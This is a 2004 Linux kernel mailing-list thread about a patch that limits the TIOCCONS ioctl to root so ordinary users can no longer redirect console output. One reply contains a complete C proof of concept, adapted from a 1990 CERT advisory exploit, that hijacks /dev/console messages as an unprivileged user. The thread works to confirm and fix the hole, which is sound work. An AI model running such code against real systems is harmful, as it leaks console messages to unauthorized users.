[Patch] TIOCCONS security

[Patch] TIOCCONS security

[Olaf Dabrunz]

Hi,

the ioctl TIOCCONS allows any user to redirect console output to another
tty. This allows anyone to suppress messages to the console at will.

AFAIK nowadays not many programs write to /dev/console, except for start
scripts and the kernel (printk() above console log level).

Still, I believe that administrators and operators would not like any
user to be able to hijack messages that were written to the console.

The only user of TIOCCONS that I am aware of is bootlogd/blogd, which
runs as root. Please comment if there are other users.

Is there any reason why normal users should be able to use TIOCCONS?

Otherwise I would suggest to restrict access to root (CAP_SYS_ADMIN),
e.g. with this patch.

--- drivers/char/tty_io.c.orig	2004-08-25 12:51:17.000000000 +0200
+++ drivers/char/tty_io.c	2004-08-25 17:05:15.097068780 +0200
@@ -1566,10 +1566,10 @@
 
 static int tioccons(struct file *file)
 {
+	if (!capable(CAP_SYS_ADMIN))
+		return -EPERM;
 	if (file->f_op->write == redirected_tty_write) {
 		struct file *f;
-		if (!capable(CAP_SYS_ADMIN))
-			return -EPERM;
 		spin_lock(&redirect_lock);
 		f = redirect;
 		redirect = NULL;

-- 
Olaf Dabrunz (od/odabrunz), SUSE Linux AG, Nürnberg

Re: [Patch] TIOCCONS security

[Christoph Hellwig]

On Wed, Aug 25, 2004 at 05:11:06PM +0200, Olaf Dabrunz wrote:
> Hi,
> 
> the ioctl TIOCCONS allows any user to redirect console output to another
> tty. This allows anyone to suppress messages to the console at will.
> 
> AFAIK nowadays not many programs write to /dev/console, except for start
> scripts and the kernel (printk() above console log level).
> 
> Still, I believe that administrators and operators would not like any
> user to be able to hijack messages that were written to the console.
> 
> The only user of TIOCCONS that I am aware of is bootlogd/blogd, which
> runs as root. Please comment if there are other users.

Oh, common.  Do your basic research - this has been rejected a few times
and there have been better proposals.  Just use goggle a little bit.

Re: [Patch] TIOCCONS security

[Christoph Hellwig]

On Wed, Aug 25, 2004 at 04:15:04PM +0100, Christoph Hellwig wrote:
> > Still, I believe that administrators and operators would not like any
> > user to be able to hijack messages that were written to the console.
> > 
> > The only user of TIOCCONS that I am aware of is bootlogd/blogd, which
> > runs as root. Please comment if there are other users.
> 
> Oh, common.  Do your basic research - this has been rejected a few times
> and there have been better proposals.  Just use goggle a little bit.

Umm, I'm smoking crack.  Sorry, for some reason I took this for another
TIOCGDEV submission without reading.

Re: [Patch] TIOCCONS security

[Olaf Dabrunz]

On 25-Aug-04, Christoph Hellwig wrote:
> On Wed, Aug 25, 2004 at 04:15:04PM +0100, Christoph Hellwig wrote:
> > > Still, I believe that administrators and operators would not like any
> > > user to be able to hijack messages that were written to the console.
> > > 
> > > The only user of TIOCCONS that I am aware of is bootlogd/blogd, which
> > > runs as root. Please comment if there are other users.
> > 
> > Oh, common.  Do your basic research - this has been rejected a few times
> > and there have been better proposals.  Just use goggle a little bit.
> 
> Umm, I'm smoking crack.  Sorry, for some reason I took this for another
> TIOCGDEV submission without reading.

(Don't do this to me. ;))

BTW, I found that xterm -C is using this. xterm(1x) is misleading
though because it states that /dev/console must belong to the user of
xterm -C. I did not do a thorough check, but since the availability of
the "-C" option depends on TIOCCONS (or SRIOCSREDIR) being available,
this should work without /dev/console belonging to the user of TIOCCONS.

Anyway, there are other ways to read log messages from X. One is to use
xconsole on /dev/xconsole and have syslogd provide filtered messages to
/dev/xconsole.

Changing the ownership on /dev/console causes security problems (that
user can usually access the current virtual terminal anytime, and the
current one may not belong to him). This does not happen with
/dev/xconsole, so it is possible to change the ownership of
/dev/xconsole to the first local X user.

While /dev/xconsole may not be the same as /dev/console, e.g. boot
script messages do go to the console (that's why bootlogd uses
TIOCCONS), it seems to be the best bet so far. It may even be possible
to pipe boot messages to /dev/xconsole.

The bottom line is, that I do not see why normal users should be able to
use TIOCCONS. Hijacking console output is a security problem, which has
been found quite some time ago on SunOS as well
(http://www.cert.org/advisories/CA-1990-12.html).

-- 
Olaf Dabrunz (od/odabrunz), SUSE Linux AG, Nürnberg

Re: [Patch] TIOCCONS security

[Kees Cook]

On Wed, 25 Aug 2004 18:18:37 +0200, Olaf Dabrunz wrote:
> The bottom line is, that I do not see why normal users should be able to
> use TIOCCONS. Hijacking console output is a security problem, which has
> been found quite some time ago on SunOS as well
> (http://www.cert.org/advisories/CA-1990-12.html).

Confirmed.  If you run the following code as a regular user, you can see
messages.  (BTW: don't do a "tail -f /dev/console".  For reasons I don't
understand, it writes endless CRs to which ever tty you happen to have
open):

# echo "ew. information leak." >> /dev/console


/* lifted from CA-1990-12 exploit code */
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <termio.h>
#include <errno.h>

main()
{
  int m,s;
  char buf[1024];
  char *l;
  size_t bytes;

  /* probably unused tty */
  static char lastpty[]="/dev/ptyvf";

  if((m=open(lastpty,O_RDWR)) == -1) {
    perror(lastpty);
    exit(1);
  }

  lastpty[5]='t';
  if((s=open(lastpty,O_RDWR)) == -1) {
    perror(lastpty);
    exit(1);
  }

  if(ioctl(s,TIOCCONS) == -1) {
    perror("TIOCONS");
    exit(1);
  }

  do {
    if ((bytes=read(m,buf,sizeof buf))<0 && errno!=EINTR)
          return 1;
    write(fileno(stdout),buf,bytes);
  } while (1);

  return 0;
}

Re: [Patch] TIOCCONS security

[Valdis.Kletnieks]

[-- Attachment #1: Type: text/plain, Size: 463 bytes --]

On Wed, 25 Aug 2004 14:03:41 PDT, Kees Cook said:

> Confirmed.  If you run the following code as a regular user, you can see
> messages.  (BTW: don't do a "tail -f /dev/console".  For reasons I don't
> understand, it writes endless CRs to which ever tty you happen to have
> open):

It's probably a bananana problem.  The tail -f writes something, which ends in
a \n.  Then the tail -f reads the last thing written, which was a \n, and
writes it out, and..... 


[-- Attachment #2: Type: application/pgp-signature, Size: 226 bytes --]